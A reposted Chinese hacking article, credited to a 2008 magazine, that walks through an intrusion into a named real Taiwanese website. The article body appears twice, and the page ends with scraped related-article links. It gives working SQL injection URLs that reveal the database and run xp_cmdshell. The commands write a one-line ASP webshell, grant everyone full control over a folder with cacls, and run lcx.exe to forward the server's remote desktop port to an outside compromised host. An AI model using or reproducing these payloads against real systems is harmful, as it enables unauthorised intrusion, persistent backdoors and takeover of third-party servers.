Asp.net注入台湾站
来源:互联网 发布:d3.v3.min.js引用 编辑:程序博客网 时间:2024/05/01 10:29
题目:Asp.net注入台湾站
作者:冷颜
作者:冷颜
http://hi.baidu.com/wolfexp09/item/56f57023782f193194f62bb2
此文章已发表在《黑客X档案》2008年第5期杂志上
如转载请务必保留此信息!
一次在渗透群里看到小天同学放出一个被他挂了txt的台湾站,看了下发现是个ASP.NET的整站系统,问了一下他情况,据说是权限设置有点BT,一直拿不到webshell。因为之前有看过一些aspx的注入教程,正好可以练练手,于是有了下面的文章。
一.注入检测
随便打开个带参数链接,加入单引号,立刻出现了错误(图1)。接着提交
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19' and (select @@version)>0 and ''='
图1
暴出了MS SQL SERVER的版本,确定服务器采用的是ASP.NET+MS SQLSERVER架构(图2)。
这下好办了,依次提交下面地址。得到数据库名newkuai和当前数据库用户sa(图3)。
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19' and db_name()>0 and ''='
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19' and system_user>0 and ''='
图2
图3
sa大家都应该相当熟悉了吧,如果它的权限是默认设置的话权限是相当高的,可以调用SQL SERVER里所有的存储过程,其中最重要的莫过于xp_cmdshell了。现在这种情况最理想的办法就是利用xp_cmdshell加个管理员,然后远程登陆3389了,但是现实往往是残酷的,不然小天同学也不至于连个webshell都拿不了。用BluePortScan扫了下1到10000的端口,居然什么端口都没扫到,十有八九是防火墙隔开了,没办法只好继续下去。
现在权限有了,接下来就到找web路径。ASP.NET暴网站路径比较有意思,许多没配置好的服务器只要在ASPX文件前面加个'~'符号它就会暴出找不到文件的错误,从而暴露了网站的物理路径。提交下面地址,暴出了网站的路径C:\Inetpub\wwwroot\web\newkuai\(图4)。
http://www.kuai-kuai.com.tw/~NewsDetail.aspx?id=19
图4
二.打破权限配置
现在有了WEB路径,尝试向WEB目录写入文件,顺便测试下xp_cmdshell有没被删除。先查看下本机的ip地址,提交下面地址,然后通过访问ip.txt就可以看到命令的执行结果了,发现ip.txt成功写入的同时也确定了该服务器放在了内网(图5)。
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19';exec master.dbo.xp_cmdshell 'ipconfig > C:\Inetpub\wwwroot\web\newkuai\1.asp'--
图5
接着写入一句话小马,
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19';exec master.dbo.xp_cmdshell 'echo ^<%25execute request("l")%25^> > C:\Inetpub\wwwroot\web\newkuai\1.asp'--
再从IE访问1.asp,成功写入了,于是尝试提交个大马,结果提示写入文件失败,连续换了几个目录都同样失败了,应该是管理员限制了整个WEB目录的写入权限了(图6)。没有了写入权限,意味着连文件都不能上传,造成的不便可想而知。但是没关系,它的目录不让写入,那就我们自己来创建一个完全控制权的目录。
图6
先创建一个目录'hack',然后看下它在WEB目录下的权限设置,依次提交下面URL,可以看到hack目录默认情况下只有读取权限(图7)。
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19';exec master.dbo.xp_cmdshell 'mkdir C:\Inetpub\wwwroot\web\newkuai\hack'--
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19';exec master.dbo.xp_cmdshell 'cacls C:\Inetpub\wwwroot\web\newkuai\hack > C:\Inetpub\wwwroot\web\newkuai\1.txt'--
图7
接下来要用到一个NTFS下才能用的权限配置命令CACLS,命令的基本用法如下。
C:\>cacls
显示或者修改文件的访问控制表(ACL)
CACLS filename [/T] [/E] [/C] [/G user:perm] [/R user [...]]
[/P user:perm [...]] [/D user [...]]
filename 显示 ACL。
/T 更改当前目录及其所有子目录中
指定文件的 ACL。
/E 编辑 ACL 而不替换。
/C 在出现拒绝访问错误时继续。
/G user:perm 赋予指定用户访问权限。
Perm 可以是: R 读取
W 写入
C 更改(写入)
F 完全控制
/R user 撤销指定用户的访问权限(仅在与 /E 一起使用时合法)。
/P user:perm 替换指定用户的访问权限。
Perm 可以是: N 无
R 读取
W 写入
C 更改(写入)
F 完全控制
/D user 拒绝指定用户的访问。
网上也有很多关于使用CACLS来进行提权的办法,但是测试后发现网上所说的命令'CACLS D: /E /T /G everyone:F'并不能通用,下面是我自己对该命令用法的一些总结。
CACLS只加参数/G后直接执行会出现一个是否执行的提示,因为我们在注入里不能键入确定,因此cacls往往没有执行。加入参数 /E /G后将不会出现提示而直接执行,但是参数 /E 的作用是编辑ACL而不替换已赋予的用户权限,而我们本身目录里已经包含了'everyone:R'的权限设置,所以执行后仍然是'everyone:R'。这种情况下,我们首先要用 /D 参数先把要赋权的用户拒绝访问,然后再执行赋权。
依次提交,
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19';exec master.dbo.xp_cmdshell 'cacls C:\Inetpub\wwwroot\web\newkuai\hack /e /d everyone'--
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19';exec master.dbo.xp_cmdshell 'cacls C:\Inetpub\wwwroot\web\newkuai\hack /e /g everyone:F'--
执行后成功把完全控制权限赋予了everyone,可以从图8和图9里看到'hack'目录前后控制权限的变化,接着再用一句话小马提交数据的时候已经可以写入了(图10)。
图8
图9
图10
三.完完全全的入侵
相信每个爱好入侵的朋友都一样,喜欢渗透到底,当然我也不会例外。有了写入的权限加上SA,后面的入侵也变得顺利成章了。先是确认服务器终端服务有启动并且端口是3389,然后换上大马上传端口转发工具lcx.exe,准备将服务器的3389的端口转发出来,因为我没有公网IP,所以再把lcx上传到有公网IP的肉鸡上进行监听。简单说下LCX的转发原理和使用方法,首先在肉鸡上的命令行下执行lcx -listen 51 880 ,作用是把监听到的发往本机51端口的数据传送到本机的880端口,而在台湾站上要执行的命令格式是lcx -slave 肉鸡IP 51 本机IP 3389,意思是把本机的3389端口传送到指定肉鸡的51端口上,而我们只需要在肉鸡上用远程桌面连接本地的880(127.0.0.1:880)端口就可以登陆到台湾服务器上了。提交以下地址执行lcx,最后利用自己添加的管理员帐号成功登陆到台湾站上(图11)。
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19';exec master.dbo.xp_cmdshell 'C:\Inetpub\wwwroot\web\newkuai\lcx.exe -slave 222.240.166.xxx 51 192.168.1.2 3389'--
此文章已发表在《黑客X档案》2008年第5期杂志上
如转载请务必保留此信息!
一次在渗透群里看到小天同学放出一个被他挂了txt的台湾站,看了下发现是个ASP.NET的整站系统,问了一下他情况,据说是权限设置有点BT,一直拿不到webshell。因为之前有看过一些aspx的注入教程,正好可以练练手,于是有了下面的文章。
一.注入检测
随便打开个带参数链接,加入单引号,立刻出现了错误(图1)。接着提交
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19' and (select @@version)>0 and ''='
图1
暴出了MS SQL SERVER的版本,确定服务器采用的是ASP.NET+MS SQLSERVER架构(图2)。
这下好办了,依次提交下面地址。得到数据库名newkuai和当前数据库用户sa(图3)。
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19' and db_name()>0 and ''='
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19' and system_user>0 and ''='
图2
图3
sa大家都应该相当熟悉了吧,如果它的权限是默认设置的话权限是相当高的,可以调用SQL SERVER里所有的存储过程,其中最重要的莫过于xp_cmdshell了。现在这种情况最理想的办法就是利用xp_cmdshell加个管理员,然后远程登陆3389了,但是现实往往是残酷的,不然小天同学也不至于连个webshell都拿不了。用BluePortScan扫了下1到10000的端口,居然什么端口都没扫到,十有八九是防火墙隔开了,没办法只好继续下去。
现在权限有了,接下来就到找web路径。ASP.NET暴网站路径比较有意思,许多没配置好的服务器只要在ASPX文件前面加个'~'符号它就会暴出找不到文件的错误,从而暴露了网站的物理路径。提交下面地址,暴出了网站的路径C:\Inetpub\wwwroot\web\newkuai\(图4)。
http://www.kuai-kuai.com.tw/~NewsDetail.aspx?id=19
图4
二.打破权限配置
现在有了WEB路径,尝试向WEB目录写入文件,顺便测试下xp_cmdshell有没被删除。先查看下本机的ip地址,提交下面地址,然后通过访问ip.txt就可以看到命令的执行结果了,发现ip.txt成功写入的同时也确定了该服务器放在了内网(图5)。
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19';exec master.dbo.xp_cmdshell 'ipconfig > C:\Inetpub\wwwroot\web\newkuai\1.asp'--
图5
接着写入一句话小马,
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19';exec master.dbo.xp_cmdshell 'echo ^<%25execute request("l")%25^> > C:\Inetpub\wwwroot\web\newkuai\1.asp'--
再从IE访问1.asp,成功写入了,于是尝试提交个大马,结果提示写入文件失败,连续换了几个目录都同样失败了,应该是管理员限制了整个WEB目录的写入权限了(图6)。没有了写入权限,意味着连文件都不能上传,造成的不便可想而知。但是没关系,它的目录不让写入,那就我们自己来创建一个完全控制权的目录。
图6
先创建一个目录'hack',然后看下它在WEB目录下的权限设置,依次提交下面URL,可以看到hack目录默认情况下只有读取权限(图7)。
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19';exec master.dbo.xp_cmdshell 'mkdir C:\Inetpub\wwwroot\web\newkuai\hack'--
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19';exec master.dbo.xp_cmdshell 'cacls C:\Inetpub\wwwroot\web\newkuai\hack > C:\Inetpub\wwwroot\web\newkuai\1.txt'--
图7
接下来要用到一个NTFS下才能用的权限配置命令CACLS,命令的基本用法如下。
C:\>cacls
显示或者修改文件的访问控制表(ACL)
CACLS filename [/T] [/E] [/C] [/G user:perm] [/R user [...]]
[/P user:perm [...]] [/D user [...]]
filename 显示 ACL。
/T 更改当前目录及其所有子目录中
指定文件的 ACL。
/E 编辑 ACL 而不替换。
/C 在出现拒绝访问错误时继续。
/G user:perm 赋予指定用户访问权限。
Perm 可以是: R 读取
W 写入
C 更改(写入)
F 完全控制
/R user 撤销指定用户的访问权限(仅在与 /E 一起使用时合法)。
/P user:perm 替换指定用户的访问权限。
Perm 可以是: N 无
R 读取
W 写入
C 更改(写入)
F 完全控制
/D user 拒绝指定用户的访问。
网上也有很多关于使用CACLS来进行提权的办法,但是测试后发现网上所说的命令'CACLS D: /E /T /G everyone:F'并不能通用,下面是我自己对该命令用法的一些总结。
CACLS只加参数/G后直接执行会出现一个是否执行的提示,因为我们在注入里不能键入确定,因此cacls往往没有执行。加入参数 /E /G后将不会出现提示而直接执行,但是参数 /E 的作用是编辑ACL而不替换已赋予的用户权限,而我们本身目录里已经包含了'everyone:R'的权限设置,所以执行后仍然是'everyone:R'。这种情况下,我们首先要用 /D 参数先把要赋权的用户拒绝访问,然后再执行赋权。
依次提交,
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19';exec master.dbo.xp_cmdshell 'cacls C:\Inetpub\wwwroot\web\newkuai\hack /e /d everyone'--
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19';exec master.dbo.xp_cmdshell 'cacls C:\Inetpub\wwwroot\web\newkuai\hack /e /g everyone:F'--
执行后成功把完全控制权限赋予了everyone,可以从图8和图9里看到'hack'目录前后控制权限的变化,接着再用一句话小马提交数据的时候已经可以写入了(图10)。
图8
图9
图10
三.完完全全的入侵
相信每个爱好入侵的朋友都一样,喜欢渗透到底,当然我也不会例外。有了写入的权限加上SA,后面的入侵也变得顺利成章了。先是确认服务器终端服务有启动并且端口是3389,然后换上大马上传端口转发工具lcx.exe,准备将服务器的3389的端口转发出来,因为我没有公网IP,所以再把lcx上传到有公网IP的肉鸡上进行监听。简单说下LCX的转发原理和使用方法,首先在肉鸡上的命令行下执行lcx -listen 51 880 ,作用是把监听到的发往本机51端口的数据传送到本机的880端口,而在台湾站上要执行的命令格式是lcx -slave 肉鸡IP 51 本机IP 3389,意思是把本机的3389端口传送到指定肉鸡的51端口上,而我们只需要在肉鸡上用远程桌面连接本地的880(127.0.0.1:880)端口就可以登陆到台湾服务器上了。提交以下地址执行lcx,最后利用自己添加的管理员帐号成功登陆到台湾站上(图11)。
http://www.kuai-kuai.com.tw/NewsDetail.aspx?id=19';exec master.dbo.xp_cmdshell 'C:\Inetpub\wwwroot\web\newkuai\lcx.exe -slave 222.240.166.xxx 51 192.168.1.2 3389'--
#Web Security
0 0
- Asp.net注入台湾站
- asp.net 防注入
- asp.net Sql注入
- Asp.net 防注入
- 台湾著名讲师章立民 ASP.NET AJAX研讨会
- ASP.NET防范SQL注入
- ASP.net防SQL注入
- asp.net的注入攻击
- ASP.net防SQL注入
- ASP.net防止注入函数
- ASP.net SQL注入问题
- asp.net 防SQL注入
- ASP.NET SQL 注入解决方案
- asp.net防止sql注入
- ASP.NET 防止SQL注入。
- asp.net 防止 sql注入
- ASP.NET防止注入攻击
- ASP.NET SQL 注入解决方案
- 经济,商科与金融的区别
- NYOJ 106 背包问题
- Java异常处理总结
- SQL Profiler的权限管理
- 软件滤波
- Asp.net注入台湾站
- lucene Spring
- Fwrite和fprintf之间的区别(总结)
- 匿名枚举
- 计算机应用基础试题及参考答案
- 职场之路
- LDD3
- easyui 生成树
- 从JAVA客户端访问Redis示例(入门)
